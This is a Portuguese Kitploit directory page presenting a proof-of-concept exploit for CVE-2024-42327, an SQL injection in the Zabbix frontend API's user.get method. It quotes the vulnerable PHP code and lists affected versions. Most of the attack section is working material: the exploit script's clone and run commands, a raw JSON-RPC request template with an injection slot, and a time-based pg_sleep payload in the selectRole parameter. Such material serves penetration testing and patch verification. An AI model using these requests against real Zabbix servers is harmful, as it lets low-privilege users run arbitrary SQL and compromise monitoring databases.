Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-42327 — Exploit de prova de conceito para CVE-2024-42327, uma vulnerabilidade de injeção SQL na API do frontend do Zabbix que permite que usuários não administradores executem consultas SQL arbitrárias através do método user.get. | Kitploit
Ferramentas/GitHubGitHub/depers-rus/cve-2024-42327
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubdepers-rus/cve-2024-42327

CVE-2024-42327

Exploit de prova de conceito para CVE-2024-42327, uma vulnerabilidade de injeção SQL na API do frontend do Zabbix que permite que usuários não administradores executem consultas SQL arbitrárias através do método user.get.

Ver Repositório
3há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC e Exploit para CVE-2024-42327 / ZBX-25623

Uma conta de usuário não administrador no frontend do Zabbix com a função de Usuário padrão, ou com qualquer outra função que dê acesso à API, pode explorar esta vulnerabilidade. Existe um SQLi na classe CUser na função addRelatedObjects; esta função é chamada a partir da função CUser.get, que está disponível para todo usuário que tenha acesso à API.

изображение

Versões vulneráveis: 6.0.0 - 6.0.31, 6.4.0 - 6.4.16, 7.0.0

Versões corrigidas: 6.0.32rc1, 6.4.17rc1, 7.0.1rc1

Código vulnerável

root@kitploit:~
$db_roles = DBselect(
	'SELECT u.userid'.($options['selectRole'] ? ',r.'.implode(',r.', $options['selectRole']) : '').
	' FROM users u,role r'.
	' WHERE u.roleid=r.roleid'.
	' AND '.dbConditionInt('u.userid', $userIds)
);

Uso do exploit:

root@kitploit:~
git clone https://github.com/depers-rus/CVE-2024-42327
python3 cve-2024-42327-PoC.py -t zabbix.xyz.ru -u "depers" -p "passwd"

Requisição:

root@kitploit:~
POST /api_jsonrpc.php  HTTP/1.1
Host: zabbix.xyz.ru
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 186
Content-Type: application/json

{"jsonrpc": "2.0", "method":"user.get", "params": {"selectRole": ["roleid,{SQLi payload}"
], "userids": ["10"
]}, "auth": "---auth_token---", "id": 1}

BurpSuite PoC (SQLi Baseado em Tempo)

root@kitploit:~
SELECT pg_sleep(10)) AS DELAY
root@kitploit:~
POST /api_jsonrpc.php  HTTP/1.1
Host: zabbix.xyz.ru
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 186
Content-Type: application/json

{"jsonrpc": "2.0", "method":"user.get", "params": {"selectRole": ["roleid,(SELECT pg_sleep(10)) AS DELAY"
], "userids": ["10"
]}, "auth": "---auth_token---", "id": 1}

Prova

изображение

Referências

  • https://support.zabbix.com/browse/ZBX-25623
  • https://nvd.nist.gov/vuln/detail/CVE-2024-42327
Baixar ferramenta